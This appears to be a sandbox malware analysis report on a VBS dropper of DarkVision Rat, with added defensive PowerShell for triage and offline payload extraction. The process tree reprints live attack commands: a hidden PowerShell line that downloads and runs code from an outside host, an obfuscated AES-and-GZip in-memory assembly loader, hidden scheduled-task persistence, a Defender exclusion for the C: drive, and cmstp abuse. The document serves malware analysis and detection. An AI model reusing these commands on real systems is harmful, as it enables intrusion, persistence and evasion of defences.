Analysis

  • max time kernel
    94s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03-12-2024 17:51

General

  • Target
    2570_output.vbs
  • Size
    421KB
  • MD5
    1304afcdfc224427dfe647dd10025628
  • SHA1
    54de753563e6a041ca67a90e50c121cd32f2e125
  • SHA256
    13f879d486e63ba54d45f500025f13cb63c83956e0493434a67692f3a47cbace
  • SHA512
    23dcf2384265354d1596934f5d428df2518a410fd074ac6127c9f6b6ac896472542620966ffe6c39a3e74157f3eb3f09e2d481ee265f969861fcc5f3bbac0506
  • SSDEEP
    6144:URCyzWhqzOEHu+s+7e7C8526sSil7tJA1ikRAG9cuyVa8iix6gwXUhkSn:w8hbmbh7uiWct2yVa8ArUhkSn

Malware Config

Signatures

  • DarkVision Rat

    DarkVision Rat is a trojan written in C++.

  • Darkvision family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Runs PowerShell with its display window hidden.

  • .NET Reactor protector 1 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
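The signatures above, read together with the command lines in the process tree, give a concrete hunting set for a host suspected of running this chain: a scheduled task named 'OneNote 68537' that runs C:\Users\<user>\AppData\Roaming\Network68537Man.cmd at logon with -RunLevel Highest and -Hidden (the stager first checks whether any task action already points at its own path before registering one), a Defender exclusion for C:\ and powershell.exe added through an obfuscated Add-MpPreference call, cmstp.exe /au launched with an INF in C:\windows\temp (a documented LOLBin pattern), and a dropped C:\ProgramData\Server\server.exe. The PowerShell below is an added triage script, not part of the report or of the sample; the exact indicators come from the report, while the generic checks (tasks running interpreters from AppData, drive-root and interpreter exclusions, Defender configuration-change event 5007) are this example's own generalizations. Run it elevated on a host with Defender present.

```powershell
# Added triage script (not part of the report or the sample). Indicators
# (task name, paths, exclusion) are taken from the report; the generic
# checks are this example's own generalizations. Run elevated.

function Get-SuspiciousScheduledTask {
    # Tasks whose action runs a script or interpreter from a user profile
    # path, or runs with the highest run level, like the 'OneNote 68537'
    # task that launches Network68537Man.cmd from Roaming.
    $userProfile = '(?i)\\Users\\[^\\]+\\AppData\\(Roaming|Local)\\'
    $interp      = '(?i)\.(cmd|bat|vbs|js|ps1)(\s|$)|powershell|wscript|cscript|cmstp|mshta'
    foreach ($t in Get-ScheduledTask) {
        foreach ($a in $t.Actions) {
            $cmd = ("$($a.Execute) $($a.Arguments)").Trim()
            if ($cmd -match $userProfile -or
                ($cmd -match $interp -and "$($t.Principal.RunLevel)" -eq 'Highest')) {
                [pscustomobject]@{
                    Task     = $t.TaskName
                    RunLevel = $t.Principal.RunLevel
                    Hidden   = $t.Settings.Hidden
                    Command  = $cmd
                }
            }
        }
    }
}

function Get-BroadDefenderExclusion {
    # An exclusion on a drive root or on powershell.exe disables scanning for
    # everything that matters; the sample set both with Add-MpPreference.
    $pref = Get-MpPreference
    foreach ($e in $pref.ExclusionPath) {
        if ($e -match '^[A-Za-z]:\\?$') { [pscustomobject]@{ Type = 'Path'; Value = $e } }
    }
    foreach ($e in $pref.ExclusionProcess) {
        if ($e -match '(?i)^(powershell|pwsh|cmd|wscript|cscript|cmstp|mshta|rundll32|regsvr32)(\.exe)?$') {
            [pscustomobject]@{ Type = 'Process'; Value = $e }
        }
    }
}

function Get-DefenderExclusionChange {
    # Event 5007 (configuration changed) in the Defender Operational log
    # records each added exclusion as
    # 'New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = 0x0'.
    Get-WinEvent -LogName 'Microsoft-Windows-Windows Defender/Operational' `
                 -FilterXPath '*[System[EventID=5007]]' -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Exclusions\\(Paths|Processes)' } |
        Select-Object TimeCreated, @{ n = 'NewValue'; e = {
            (($_.Message -split "`r?`n") | Where-Object { $_ -match 'New value' }) -join ' ' } }
}

function Test-ReportIndicator {
    # Exact artifacts from this run. The task name is fixed; the user name is
    # not, so the Roaming path is checked under every local profile.
    $hits = @()
    if (Get-ScheduledTask -TaskName 'OneNote 68537' -ErrorAction SilentlyContinue) {
        $hits += 'Task: OneNote 68537'
    }
    $files = @("$env:ProgramData\Server\server.exe", "$env:windir\Temp\f5wfs5m4.inf")
    $files += Get-ChildItem "$env:SystemDrive\Users" -Directory -ErrorAction SilentlyContinue |
              ForEach-Object { Join-Path $_.FullName 'AppData\Roaming\Network68537Man.cmd' }
    foreach ($f in $files) { if (Test-Path -LiteralPath $f) { $hits += "File: $f" } }
    $hits
}

# Usage
Get-SuspiciousScheduledTask   | Format-Table -AutoSize
Get-BroadDefenderExclusion    | Format-Table -AutoSize
Get-DefenderExclusionChange   | Select-Object -First 10 | Format-Table -Wrap
Test-ReportIndicator
```

Get-ScheduledTask and Get-MpPreference describe the current state; the 5007 event query is what shows the exclusion being added even after an attacker removes it again, so check the log even when Get-MpPreference comes back clean.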

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2570_output.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4804
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3428
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b354ygql\b354ygql.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3976
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5E5.tmp" "c:\Users\Admin\AppData\Local\Temp\b354ygql\CSCBF6DCB1C89F2491BB711D588CFC66CC7.TMP"
          4⤵
            PID:3516
        • C:\windows\system32\cmstp.exe
          "C:\windows\system32\cmstp.exe" /au C:\windows\temp\f5wfs5m4.inf
          3⤵
            PID:232
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3912
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2612
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$qITC='LouFPXaduFPX'.Replace('uFPX', ''),'TUSuyraUSuynsUSuyfoUSuyrUSuymFUSuyinUSuyalUSuyBlUSuyockUSuy'.Replace('USuy', ''),'CrzEmWezEmWatezEmWDeczEmWryzEmWpzEmWtozEmWrzEmW'.Replace('zEmW', ''),'InTXcnvTXcnokeTXcn'.Replace('TXcn', ''),'ChavMYCngvMYCeEvMYCxtevMYCnvMYCsvMYCionvMYC'.Replace('vMYC', ''),'FroTZlrmTZlrBaTZlrsTZlre64TZlrStTZlrriTZlrngTZlr'.Replace('TZlr', ''),'CoMOrVpMOrVyTMOrVoMOrV'.Replace('MOrV', ''),'ReahjxadahjxLahjxiahjxneahjxsahjx'.Replace('ahjx', ''),'EoUWdnoUWdtroUWdyoUWdPooUWdioUWdntoUWd'.Replace('oUWd', ''),'EqSJhlemqSJhentqSJhAtqSJh'.Replace('qSJh', ''),'SuRkbpuRkbluRkbiuRkbtuRkb'.Replace('uRkb', ''),'GCJOUetCCJOUurCJOUrCJOUenCJOUtPrCJOUoCJOUceCJOUssCJOU'.Replace('CJOU', ''),'DeajkMcajkMoajkMmprajkMeajkMsajkMsajkM'.Replace('ajkM', ''),'MaasMVinasMVMoasMVduasMVleasMV'.Replace('asMV', '');powershell -w hidden;function gUZuM($CFHEm){$VtKjY=[System.Security.Cryptography.Aes]::Create();$VtKjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VtKjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VtKjY.Key=[System.Convert]::($qITC[5])('gEhsJeRdRC5Ki9l14TCSSipF/1hE8pGPMmODwPyopiw=');$VtKjY.IV=[System.Convert]::($qITC[5])('k4acgMLLeJA4HUn289xcAw==');$pKWcz=$VtKjY.($qITC[2])();$RhEHp=$pKWcz.($qITC[1])($CFHEm,0,$CFHEm.Length);$pKWcz.Dispose();$VtKjY.Dispose();$RhEHp;}function xBAEi($CFHEm){$EdEdU=New-Object System.IO.MemoryStream(,$CFHEm);$pWSoO=New-Object System.IO.MemoryStream;$mpgHU=New-Object System.IO.Compression.GZipStream($EdEdU,[IO.Compression.CompressionMode]::($qITC[12]));$mpgHU.($qITC[6])($pWSoO);$mpgHU.Dispose();$EdEdU.Dispose();$pWSoO.Dispose();$pWSoO.ToArray();}$tlpZd=[System.IO.File]::($qITC[7])([Console]::Title);$sQzRR=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 5).Substring(2))));$OzOEx=xBAEi (gUZuM 
([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 6).Substring(2))));[System.Reflection.Assembly]::($qITC[0])([byte[]]$OzOEx).($qITC[8]).($qITC[3])($null,$null);[System.Reflection.Assembly]::($qITC[0])([byte[]]$sQzRR).($qITC[8]).($qITC[3])($null,$null); "
              4⤵
                PID:2308
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4436
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:464
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\n1')
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1016
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 68537' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network68537Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3244
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network68537Man.cmd"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4152
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network68537Man.cmd"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4860
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network68537Man.cmd';$qITC='LouFPXaduFPX'.Replace('uFPX', ''),'TUSuyraUSuynsUSuyfoUSuyrUSuymFUSuyinUSuyalUSuyBlUSuyockUSuy'.Replace('USuy', ''),'CrzEmWezEmWatezEmWDeczEmWryzEmWpzEmWtozEmWrzEmW'.Replace('zEmW', ''),'InTXcnvTXcnokeTXcn'.Replace('TXcn', ''),'ChavMYCngvMYCeEvMYCxtevMYCnvMYCsvMYCionvMYC'.Replace('vMYC', ''),'FroTZlrmTZlrBaTZlrsTZlre64TZlrStTZlrriTZlrngTZlr'.Replace('TZlr', ''),'CoMOrVpMOrVyTMOrVoMOrV'.Replace('MOrV', ''),'ReahjxadahjxLahjxiahjxneahjxsahjx'.Replace('ahjx', ''),'EoUWdnoUWdtroUWdyoUWdPooUWdioUWdntoUWd'.Replace('oUWd', ''),'EqSJhlemqSJhentqSJhAtqSJh'.Replace('qSJh', ''),'SuRkbpuRkbluRkbiuRkbtuRkb'.Replace('uRkb', ''),'GCJOUetCCJOUurCJOUrCJOUenCJOUtPrCJOUoCJOUceCJOUssCJOU'.Replace('CJOU', ''),'DeajkMcajkMoajkMmprajkMeajkMsajkMsajkM'.Replace('ajkM', ''),'MaasMVinasMVMoasMVduasMVleasMV'.Replace('asMV', '');powershell -w hidden;function gUZuM($CFHEm){$VtKjY=[System.Security.Cryptography.Aes]::Create();$VtKjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VtKjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VtKjY.Key=[System.Convert]::($qITC[5])('gEhsJeRdRC5Ki9l14TCSSipF/1hE8pGPMmODwPyopiw=');$VtKjY.IV=[System.Convert]::($qITC[5])('k4acgMLLeJA4HUn289xcAw==');$pKWcz=$VtKjY.($qITC[2])();$RhEHp=$pKWcz.($qITC[1])($CFHEm,0,$CFHEm.Length);$pKWcz.Dispose();$VtKjY.Dispose();$RhEHp;}function xBAEi($CFHEm){$EdEdU=New-Object System.IO.MemoryStream(,$CFHEm);$pWSoO=New-Object System.IO.MemoryStream;$mpgHU=New-Object System.IO.Compression.GZipStream($EdEdU,[IO.Compression.CompressionMode]::($qITC[12]));$mpgHU.($qITC[6])($pWSoO);$mpgHU.Dispose();$EdEdU.Dispose();$pWSoO.Dispose();$pWSoO.ToArray();}$tlpZd=[System.IO.File]::($qITC[7])([Console]::Title);$sQzRR=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 5).Substring(2))));$OzOEx=xBAEi (gUZuM 
([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 6).Substring(2))));[System.Reflection.Assembly]::($qITC[0])([byte[]]$OzOEx).($qITC[8]).($qITC[3])($null,$null);[System.Reflection.Assembly]::($qITC[0])([byte[]]$sQzRR).($qITC[8]).($qITC[3])($null,$null); "
                      7⤵
                        PID:4392
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        7⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:1404
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3100
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network68537Man')
                          8⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2928
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 68537' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network68537Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2840
                        • C:\ProgramData\Server\server.exe
                          "C:\ProgramData\Server\server.exe" {BBD4D601-E96C-4865-9F7D-5ED63C15EBAF}
                          8⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4512
                      • C:\Windows\system32\timeout.exe
                        timeout /nobreak /t 1
                        7⤵
                        • Delays execution with timeout.exe
                        PID:4576
                • C:\Windows\system32\timeout.exe
                  timeout /nobreak /t 1
                  4⤵
                  • Delays execution with timeout.exe
                  PID:512
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
            1⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:648
          • C:\Windows\system32\taskkill.exe
            taskkill /IM cmstp.exe /F
            1⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4992
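The n1.bat and Network68537Man.cmd stage above carries its next-stage assemblies inside the batch file itself. The de-obfuscated string table resolves to Load, TransformFinalBlock, CreateDecryptor, Invoke, ChangeExtension, FromBase64String, CopyTo, ReadLines, EntryPoint, ElementAt, Split, GetCurrentProcess, Decompress and MainModule, so the PowerShell reads the .bat (its path is smuggled in through the console title), takes the lines at zero-based index 5 and 6, drops their first two characters, Base64-decodes them, decrypts with AES-256-CBC/PKCS7 using the hard-coded key and IV, GZip-decompresses and hands each result to Assembly.Load().EntryPoint.Invoke(). The PowerShell below is an added example, not part of the report or of the sample: it reproduces that pipeline offline so the payloads can be hashed and analysed statically instead of executed. The key and IV are the ones from the command line; the '::' comment prefix on the payload lines, the function names, the fixture layout and the output file names are this example's assumptions.

```powershell
# Added example (not part of the report or the sample): recover the two
# payloads the n1.bat stager decrypts, without executing them. Key and IV
# are the ones hard-coded in the stager's command line. The '::' prefix is
# an assumption derived from its Substring(2); adjust -Skip if a sample differs.
$Key = [Convert]::FromBase64String('gEhsJeRdRC5Ki9l14TCSSipF/1hE8pGPMmODwPyopiw=')   # 32 bytes -> AES-256
$IV  = [Convert]::FromBase64String('k4acgMLLeJA4HUn289xcAw==')                       # 16 bytes

function New-StagerAes {
    # Same cipher configuration the stager builds: AES, CBC, PKCS7, fixed key/IV.
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key
    $aes.IV  = $IV
    $aes
}

function Get-N1BatPayload {
    # Mirrors the stager: ReadLines(bat) -> ElementAt(5|6) -> Substring(2)
    # -> FromBase64String -> AES-CBC decrypt -> GZip decompress.
    # Returns metadata plus the bytes; it never calls Assembly.Load.
    param(
        [Parameter(Mandatory)][string]$Path,
        [int[]]$LineIndex = @(5, 6),
        [int]$Skip = 2
    )
    $lines = [System.IO.File]::ReadAllLines($Path)
    $aes = New-StagerAes
    foreach ($i in $LineIndex) {
        $enc = [Convert]::FromBase64String($lines[$i].Substring($Skip))
        $dec = $aes.CreateDecryptor()
        $gz  = $dec.TransformFinalBlock($enc, 0, $enc.Length)
        $dec.Dispose()
        $in  = New-Object System.IO.MemoryStream(,$gz)
        $out = New-Object System.IO.MemoryStream
        $zs  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
        $zs.CopyTo($out); $zs.Dispose(); $in.Dispose()
        $bytes = $out.ToArray(); $out.Dispose()
        $sha = [System.Security.Cryptography.SHA256]::Create().ComputeHash($bytes)
        [pscustomobject]@{
            LineIndex = $i
            Length    = $bytes.Length
            IsPE      = ($bytes.Length -gt 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)   # 'MZ'
            SHA256    = -join ($sha | ForEach-Object { $_.ToString('x2') })
            Bytes     = $bytes
        }
    }
    $aes.Dispose()
}

function New-N1BatFixture {
    # Constructed fixture with the same layout as n1.bat so the extractor can be
    # exercised offline. The payloads are dummy bytes (starting with 'MZ' so the
    # PE check fires), not the real assemblies.
    param([Parameter(Mandatory)][string]$Path)
    $aes = New-StagerAes
    $payloadLines = foreach ($text in 'MZ dummy payload A', 'MZ dummy payload B') {
        $raw = [System.Text.Encoding]::ASCII.GetBytes($text)
        $ms  = New-Object System.IO.MemoryStream
        $zs  = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress, $true)
        $zs.Write($raw, 0, $raw.Length); $zs.Dispose()
        $gz  = $ms.ToArray(); $ms.Dispose()
        $encr = $aes.CreateEncryptor()
        $ct   = $encr.TransformFinalBlock($gz, 0, $gz.Length)
        $encr.Dispose()
        '::' + [Convert]::ToBase64String($ct)
    }
    $aes.Dispose()
    $content = @('@echo off', 'rem line1', 'rem line2', 'rem line3', 'rem line4') + $payloadLines + @('exit /b')
    [System.IO.File]::WriteAllLines($Path, [string[]]$content)
}

# Usage: build the fixture, then extract. On a real sample point -Path at
# n1.bat (or Network68537Man.cmd) and write the bytes out for static analysis.
$fixture = Join-Path $env:TEMP 'n1_fixture.bat'
New-N1BatFixture -Path $fixture
Get-N1BatPayload -Path $fixture | Select-Object LineIndex, Length, IsPE, SHA256 | Format-Table -AutoSize
# Get-N1BatPayload -Path .\n1.bat | ForEach-Object {
#     [System.IO.File]::WriteAllBytes("payload_line$($_.LineIndex).bin", $_.Bytes) }
```

Recovering the assemblies this way, rather than letting the stager run under a debugger, keeps the second stage off the host entirely; the hashes the extractor prints are what to compare against the DarkVision Rat detection and the server.exe hash in the Downloads list.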

          Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\ProgramData\Server\server.exe
            Filesize  442KB
            MD5       04029e121a0cfa5991749937dd22a1d9
            SHA1      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
            SHA256    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
            SHA512    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize  2KB
            MD5       d85ba6ff808d9e5444a4b369f5bc2730
            SHA1      31aa9d96590fff6981b315e0b391b575e4c0804a
            SHA256    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
            SHA512    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
            Filesize  2KB
            MD5       6ff7f95a302e0c50d8d4f7b24d66fdfb
            SHA1      e8c7ab533ed7aaf6d3d4e0e00878b018c1af2572
            SHA256    9a413c30009de6090b7cde2bcb14b0e7354e51c24e8ae9adf8b15e646c82dd2e
            SHA512    3fb5ffa171af2acad18ae929bcae8386988bd1316898818dfe3fdc678cd7125154f364f13621a3e765f089dd17d5ce9e68af85bb4113b364a552a2dfedda1d5d

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
            Filesize  2KB
            MD5       e4de99c1795fd54aa87da05fa39c199c
            SHA1      dfaaac2de1490fae01104f0a6853a9d8fe39a9d7
            SHA256    23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457
            SHA512    796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize  1KB
            MD5       3e7d1229ce9681666aa6cd4efc4a2113
            SHA1      0cbca0bdd18c2f3f8204ba58b2fe98cdd11d3060
            SHA256    585352dc2a63819062b74da4e6db1b40aa4344a1dff7e6fff440366cfe1a3847
            SHA512    f0e72428dd8a969621b8248cd3aae921df888d13a707efa13d98a9d121c843535378945b95f23f29d3ba6c4d49bd59506634b88f74c5ce79c8947266f8f0c600

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize  1KB
            MD5       09392ba78a0151b728c14aa32208cf70
            SHA1      aad606be1828e1d596fb199bb610c187d9193176
            SHA256    7381b12b8daa10c2bc944459a2e5227c772a51a7a6e39dcf7bfa4e57c20e4ace
            SHA512    ecfb4bffc2371c4a3d042ddbf951c53dcce1bc7c4b6e9d1045d7a611ddbdb36f48522fdfca2cb52c4fde0903d2508dab58598c2688de767a2546ecfa4662cc37

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize  1KB
            MD5       2788f5e2211ebcf304628043fe660c91
            SHA1      129d672c001464af8a755ccc461f4c87997766f1
            SHA256    b5e8703199052c2b847bc541b46c3f63ae8e2b510e2edcab98af2038255b4b84
            SHA512    616972dd0407a4d11a0882c9a202c106f7349a2c530c8b7cd169af05c10105c200f04a904c17134c442cfc9d065068fd2046332e33abd14ce35d315edc21c086

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize  896B
            MD5       3d7b2d4879bfe0095ac31e5be1a4eebf
            SHA1      ff2a47f388307191ca88127b68e6cc3683421ee0
            SHA256    a358e93a31c15c49dcae7ffa6f4a14a81da91c4b486e30208536a920127e3467
            SHA512    9b1bf1c3da615813b5d9568712fcebd0006792607a8727f7cabc7b2f9c24d2502a0a355cf1e2da69d3ef12f8fda4f77c72011b28d8ec11ba2e71cefd7e59ccfc

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize  1KB
            MD5       e70b24fbe1a86e51e396c907b244c701
            SHA1      18d081a62ae46c425be7f583dda45cc3c81ddd23
            SHA256    4e8072e1d2c18c892364a663463766453b3958c71bc25e2c8e0c47bd341eac73
            SHA512    1f55bc804858a5aeb556c1f58721aae1641c4c3c408351c38d6648e013546e883bd1b00ead8f345889c3644030931ea1269003c49c3ab7d1864a106eb0549c16

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize  1KB
            MD5       ea00fa61c8f36005e1bdefe522ffae76
            SHA1      e9ca717f63327b39fefbcdbea2d987261e53529f
            SHA256    380c15998927ac363f599bcf4054de3380892ff9c6ee1afe9ca89cd37fcdf1e9
            SHA512    76e6511fd03b49565c657287d3cb2389641bcf2651bb70a65d3503e686259ab3684e8fd5833bfa02d3a00b667add603dfa66dda10fab1bc3faf3ca0a37990d20

          • C:\Users\Admin\AppData\Local\Temp\RESA5E5.tmp
            Filesize  1KB
            MD5       5101a985d3d9b5f6d8a85f10d814e91c
            SHA1      bbc3f4384e0f5f30b8cc2a4bafb6e623788fc9f6
            SHA256    1990bb72577ca60da00443daf52f3b5ebec5130d10fee04d64f0b0524830f788
            SHA512    65154ec46ec9184142adcee2ea453af4b5cb16273c2aa7e516e0c12bebbfc9cb499e115b931c1ebad8c2a19a4481e09c50808a7b0764941f4b6be42be6b9d6ff

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0zteriel.cem.ps1
            Filesize  60B
            MD5       d17fe0a3f47be24a6453e9ef58c94641
            SHA1      6ab83620379fc69f80c0242105ddffd7d98d5d9d
            SHA256    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
            SHA512    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\b354ygql\b354ygql.dll
            Filesize  4KB
            MD5       f3e03e05def1f66c96ec3d0aa04c3a85
            SHA1      6c64abd6802a129273e01b455e3ed8fd63bfacae
            SHA256    516ead4c37660189e3d224262f54083aa619bd9984643e65dadf56375c461fe8
            SHA512    cf6f67435cfb989513d796a149a8cf8db61c78b63c4456448c9e8c008d56d34245c11ee0985044bc625e825f2d87918be113ce254d17fbe7b6daa22a5f237b03

          • C:\Users\Admin\AppData\Local\Temp\n1.bat
            Filesize  420KB
            MD5       a21d4680c8d115c444119d6b1ca6aed6
            SHA1      fdbb2d3c7eb9ea5c93781f91bf2157d25f82c2f2
